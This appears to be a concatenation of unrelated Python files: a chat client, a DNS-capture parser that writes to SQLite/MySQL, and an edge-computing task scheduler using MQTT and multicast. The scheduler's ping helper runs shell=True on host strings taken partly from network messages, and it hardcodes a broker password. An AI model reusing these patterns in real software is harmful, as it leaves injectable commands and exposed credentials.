hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_RETURN,
file=target_filename,
line=writer.get_line_index_with_content('break main')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
# Jython needs some vars to be set locally.
# set JAVA_HOME=c:\bin\jdk1.8.0_172
# set PATH=%PATH%;C:\bin\jython2.7.0\bin
# set PATH=%PATH%;%JAVA_HOME%\bin
# c:\bin\jython2.7.0\bin\jython.exe -m py.test tests_python
if __name__ == '__main__':
pytest.main(['-k', 'test_case_12'])
|
client.py
|
import socket
import threading
username = raw_input("UserName : ")
#socket initialization, IPv4 protocol domain, TCP communication type
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#connecting client to server
client.connect(('127.0.0.1', 7976))
def receive():
while True:
# making valid connection
try:
message = client.recv(1024).decode('ascii')
if message == 'UserName':
client.send(username.encode('ascii'))
else:
print(message)
except:
# case on wrong ip/port details
print("An error occured!")
client.close()
break
#message layout
def write():
while True:
message = '{}: {}'.format(username, raw_input(''))
client.send(message.encode('ascii'))
#receiving multiple messages
receive_thread = threading.Thread(target=receive)
receive_thread.start()
#sending messages
write_thread = threading.Thread(target=write)
write_thread.start()
|
dnsmapIO.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2014, FTW Forschungszentrum Telekommunikation Wien
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of FTW nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL FTW
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import sys
import time
import Queue
import multiprocessing as mp
import socket
import base64
import re
import sqlite3
from os.path import getsize as file_getsize
import gzip
# import netaddr
import netaddr
import pcap
import dpkt
from netaddr import IPAddress
import progressbar
INPUTMODE_FIFO=1
INPUTMODE_PROTOBUF=2
INPUTMODE_PCAP_FILE=3
INPUTMODE_PCAP_IF=4
DNS_RECORD_TYPES_={
1: 'DNS_A',
2: 'DNS_NS',
3: 'DNS_MD',
4: 'DNS_MF',
5: 'DNS_CNAME',
6: 'DNS_SOA',
7: 'DNS_MB',
8: 'DNS_MG',
9: 'DNS_MR',
10: 'DNS_NULL_RR',
11: 'DNS_WKS',
12: 'DNS_PTR',
13: 'DNS_HINFO',
14: 'DNS_MINFO',
15: 'DNS_MX',
16: 'DNS_TXT',
17: 'DNS_RP',
18: 'DNS_AFSDB',
19: 'DNS_X25',
20: 'DNS_ISDN',
21: 'DNS_RT',
22: 'DNS_NSAP',
23: 'DNS_NSAP_PTR',
24: 'DNS_SIG',
25: 'DNS_KEY',
26: 'DNS_PX',
27: 'DNS_GPOS',
28: 'DNS_AAAA',
29: 'DNS_LOC',
30: 'DNS_NXT',
31: 'DNS_EID',
32: 'DNS_NIMLOC',
33: 'DNS_SRV',
34: 'DNS_ATMA',
35: 'DNS_NAPTR',
36: 'DNS_KX',
37: 'DNS_CERT',
38: 'DNS_A6',
39: 'DNS_DNAME',
40: 'DNS_SINK',
41: 'DNS_OPT',
42: 'DNS_APL',
43: 'DNS_DS',
44: 'DNS_SSHFP',
45: 'DNS_IPSECKEY',
46: 'DNS_RRSIG',
47: 'DNS_NSEC',
48: 'DNS_DNSKEY',
49: 'DNS_DHCID',
50: 'DNS_NSEC3',
51: 'DNS_NSEC3PARAM',
55: 'DNS_HIP',
56: 'DNS_NINFO',
57: 'DNS_RKEY',
99: 'DNS_SPF',
100: 'DNS_UINFO',
101: 'DNS_UID',
102: 'DNS_GID',
103: 'DNS_UNSPEC',
249: 'DNS_TKEY',
250: 'DNS_TSIG',
251: 'DNS_IXFR',
252: 'DNS_AXFR',
253: 'DNS_MAILB',
254: 'DNS_MAILA',
255: 'DNS_ALL',
32768: 'DNS_TA',
32769: 'DNS_DLV',
65535: 'DNS_UNKNOWN'
}
def checkMapping(dic, dname, ips):
newIps = set()
newMapping = False
if dname in dic: #partially or totally mapped?
for ip in ips:
if ip in dic[dname]: #totally mapped
continue
else:
newIps.add(ip) #partially mapped --> new mapping
dic[dname].add(ip)
newMapping = True
if newMapping:
return newIps
else:
return None
else: #new mapping
newIps = set(ips)
dic[dname] = newIps
return newIps
def dumpToDatabase(curs, timestamp, fqdn, ips, clientID, table):
for ip in ips:
sql = "INSERT INTO %s" % table
sql += " (timestamp, fqdn, ip, clientID) values (%s, %s, %s, %s)"
curs.execute(sql, (timestamp, fqdn, int(ip), clientID))
# alternative, works for sqlite only
#curs.execute("INSERT INTO dnsmappings(timestamp, fqdn, ip) VALUES(?,?,?)", (timestamp, fqdn, int(ip)))
def pcapReader(q, exitSignal, infile=None, interface=None, thrsh=0):
if not infile and not interface:
# FIXME: write warning here
return
# open the file
if infile:
pc=pcap.pcapObject()
try:
pc.open_offline(infile)
except IOError:
#log("could not open pcap interface "+str(input_interface)+"\n")
pass
if interface:
pc=pcap.pcapObject()
try:
#pc.open_live(interface, snaplen, promisc, read_timeout)
pc.open_live(interface, 1600, 0, 100)
except IOError:
#log("could not open pcap interface "+str(input_interface)+"\n")
pass
except Exception:
# most likely we got no permission to open the interface
sys.stderr.write('could not open interface. insufficient '
'permissions?\n')
q.put(None)
return
pc.setfilter('udp', 0, 0)
basets=0
newMappings=dict()
while True:
if exitSignal.is_set():
break
try:
packet=pc.next()
if not packet:
if infile:
# end of file
break
elif interface:
# read timeout
continue
payload=packet[1]
timestamp=int(packet[2])
# make sure we are dealing with IP traffic
# ref: http://www.iana.org/assignments/ethernet-numbers
try: eth = dpkt.ethernet.Ethernet(payload)
except: continue
if eth.type != 2048: continue
# make sure we are dealing with UDP
# ref: http://www.iana.org/assignments/protocol-numbers/
try: ip = eth.data
except: continue
if ip.p != 17: continue
# filter on UDP assigned ports for DNS
# ref: http://www.iana.org/assignments/port-numbers
try: udp = ip.data
except: continue
if udp.sport != 53 and udp.dport != 53: continue
# make the dns object out of the udp data and check for it being a RR (answer)
# and for opcode QUERY (I know, counter-intuitive)
try: dns = dpkt.dns.DNS(udp.data)
except: continue
if dns.qr != dpkt.dns.DNS_R: continue
if dns.opcode != dpkt.dns.DNS_QUERY: continue
if dns.rcode != dpkt.dns.DNS_RCODE_NOERR: continue
if len(dns.an) < 1: continue
if len(dns.qd) == 0: continue
aRecords=set()
queriedName=dns.qd[0].name
if not '.' in queriedName:
continue
#lastCname=queriedName
ttl = 0 # default value 0
for answer in dns.an:
"""
FIXME: this doesn't work for multiple queries in one DNS packet
"""
#if answer.type == dpkt.dns.DNS_CNAME:
# lastCname=answer.cname
if answer.type == dpkt.dns.DNS_A:
ip_temp=socket.inet_ntoa(answer.rdata)
try:
addr=IPAddress(ip_temp)
ttl = answer.ttl;
except netaddr.AddrFormatError:
continue
else:
if (addr.is_unicast() and
not addr.is_private() and
not addr.is_reserved() and
not addr.is_loopback()):
aRecords.add(addr)
if thrsh:
if (timestamp-basets) > thrsh:
basets = timestamp
newMappings.clear()
newIps = checkMapping(newMappings, queriedName, aRecords)
aRecords=newIps
if not aRecords:
continue
# data = ((queriedName, ip.dst, aRecords), timestamp)
data = ((queriedName, socket.inet_ntoa(ip.dst), aRecords,ttl), timestamp)
# print ip.dst;
# print socket.inet_ntoa(ip.dst);
queued=False
while not queued:
try:
q.put_nowait(data)
except Queue.Full:
# we saturated the queue, let's give the reading
# process some time to empty it again, where we don't
# try to put something in the queue and thereby lock it
# continuously
time.sleep(sleeptime)
if q.empty():
sleeptime*=0.5
elif q.qsize() >= q._maxsize:
sleeptime*=2
if sleeptime>maxSleeptime:
sleeptime=maxSleeptime
else:
queued=True
except KeyboardInterrupt:
break
"""
send shutdown signal
"""
q.put(None)
def protobufReader(infile, q, exitSignal, thrsh=0, useProgressbar=True):
"""
not implemented
"""
pass
def fifoReader(infile, q, exitSignal):
sleeptime=0.5
maxSleeptime=1.0
while True:
try:
if exitSignal.is_set(): break
line=infile.readline()
if not line:
time.sleep(1)
continue
if line=='ENDOFFILE':
break
try:
spl=line.split()
timestamp, queriedName, clientID, ipv4 = spl
except:
continue
else:
if not '.' in queriedName:
continue
try:
addr=IPAddress(ipv4)
except netaddr.AddrFormatError:
continue
else:
if (addr.is_unicast() and
not addr.is_private() and
not addr.is_reserved() and
not addr.is_loopback()):
try:
timestamp=int(timestamp)
except ValueError:
continue
else:
data = ((queriedName, clientID, [addr]),
timestamp)
queued=False
while not queued:
try:
q.put_nowait(data)
except Queue.Full:
# we saturated the queue, let's give the reading
# process some time to empty it again, where we don't
# try to put something in the queue and thereby lock it
# continuously
time.sleep(sleeptime)
if q.empty():
sleeptime*=0.5
elif q.qsize() >= q._maxsize:
sleeptime*=2
if sleeptime>maxSleeptime:
sleeptime=maxSleeptime
else:
queued=True
except KeyboardInterrupt:
break
q.put(None)
def fakeMappingGenerator(filename):
with open(filename, 'r') as f:
for line in f:
"""
expect format <timestamp> <fqdn> <IP>
"""
sline=line.split()
timestamp=int(sline[0])
fqdn=sline[1]
ip=IPAddress(sline[2])
yield (timestamp, fqdn, ip)
class recGen(object):
def __init__(self, inputSource, mode, gzippedInput=False, thrsh=0,
useProgressbar=True, dbfile=None, dbserver=None):
"""
mode:
1: read from fifo
2: read from protobuf file
3: read from pcap file
4: read from pcap interface
dbfile: a filename to create an SQLite database containing the
processed NOERROR queries
dbserver: a tuple (serverIP, dbuser, dbpass, dbname) specifying a MYSQL
database for storing the processed NOERROR queries
returns (ticket_dns object, timestamp)
if thrsh==0: don't filter
else: filter every thrsh seconds
"""
self.mode=mode
self.inputSource=inputSource
self.gzippedInput=gzippedInput
self.thrsh=thrsh
self.useProgressbar=useProgressbar
self.dbfile=dbfile
self.dbserver=dbserver
self.dbtable='dnsmappings'
self.infile=None
def __enter__(self):
if (self.mode==INPUTMODE_FIFO or self.mode==INPUTMODE_PROTOBUF or
self.mode==INPUTMODE_PCAP_FILE):
if self.inputSource=='-':
self.infile = sys.stdin
else:
if self.gzippedInput:
self.infile=gzip.GzipFile(self.inputSource)
else:
self.infile = open(self.inputSource, 'rb')
if self.dbfile:
self.conn=sqlite3.connect(self.dbfile)
self.curs=self.conn.cursor()
self.curs.execute("CREATE TABLE dnsmappings(Id BIGINT PRIMARY KEY AUTOINCREMENT, timestamp INT, fqdn TEXT, ip INT, clientID INT)")
self.curs.execute("CREATE INDEX ip_idx ON dnsmappings (fqdn);")
self.conn.commit()
elif self.dbserver:
import MySQLdb
serverIP,dbuser,dbpass,dbname=self.dbserver
self.conn = MySQLdb.connect(serverIP,dbuser,dbpass,dbname)
self.curs=self.conn.cursor()
self.curs.execute("CREATE TABLE dnsmappings(Id BIGINT AUTO_INCREMENT, timestamp int unsigned, fqdn varchar(255), ip int unsigned, clientID int unsigned, PRIMARY KEY (Id), INDEX(fqdn))")
self.conn.commit()
return self
def __exit__(self, *exc_info):
if (self.mode==INPUTMODE_FIFO or self.mode==INPUTMODE_PROTOBUF or
self.mode==INPUTMODE_PCAP_FILE) and self.infile!=sys.stdin:
self.infile.close()
if self.dbfile or self.dbserver:
self.conn.commit()
self.conn.close()
def __iter__(self):
return self
def next(self):
return self.nnext()
def nnext(self):
q = mp.Queue(10000)
exitSignal = mp.Event()
if self.mode==INPUTMODE_FIFO:
proc = mp.Process(target=fifoReader, args=(self.infile, q, exitSignal))
elif self.mode==INPUTMODE_PROTOBUF:
if self.gzippedInput:
proc = mp.Process(target=protobufReader, args=(self.infile, q, exitSignal,
self.thrsh, False))
else:
proc = mp.Process(target=protobufReader, args=(self.infile, q, exitSignal,
self.thrsh, self.useProgressbar))
elif self.mode==INPUTMODE_PCAP_FILE:
proc = mp.Process(target=pcapReader, args=(q, exitSignal,),
kwargs={'thrsh':self.thrsh, 'infile':self.inputSource})
elif self.mode==INPUTMODE_PCAP_IF:
proc = mp.Process(target=pcapReader, args=(q, exitSignal,),
kwargs={'thrsh':self.thrsh, 'interface':self.inputSource})
proc.daemon = True
proc.start()
while True:
try:
try:
data = q.get(timeout=1) # this is the only consumer and the queue is not empty, so it returns the next item immediately
except Queue.Empty:
"""
read timeout: return an empty record to keep the DNSMap going
"""
yield ((None, None, []), None)
continue
else:
if data == None:
break
else:
if self.dbfile or self.dbserver:
(queriedName, clientID, ips,ttl), timestamp = data
dumpToDatabase(self.curs, timestamp, queriedName,
ips, clientID, self.dbtable)
yield data
except KeyboardInterrupt:
"""
kill the reader process
"""
exitSignal.set()
def recordTypeToStr(rec_type):
try:
return DNS_RECORD_TYPES_[rec_type]
except IndexError:
return 'UNKNOWN'
if __name__ == "__main__":
import sys
r=recGen(mode=INPUTMODE_PROTOBUF, inputSource=sys.argv[1],
thrsh=0, useProgressbar=False, gzippedInput=True)
for record in r:
for ip in record[0][2]:
print record[1], record[0][0], str(ip)
|
algo_three.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
# cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
cmd = ['ifconfig ens4 | grep inet | head -n 1 | cut -d "t" -f 2 | cut -d " " -f 2']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
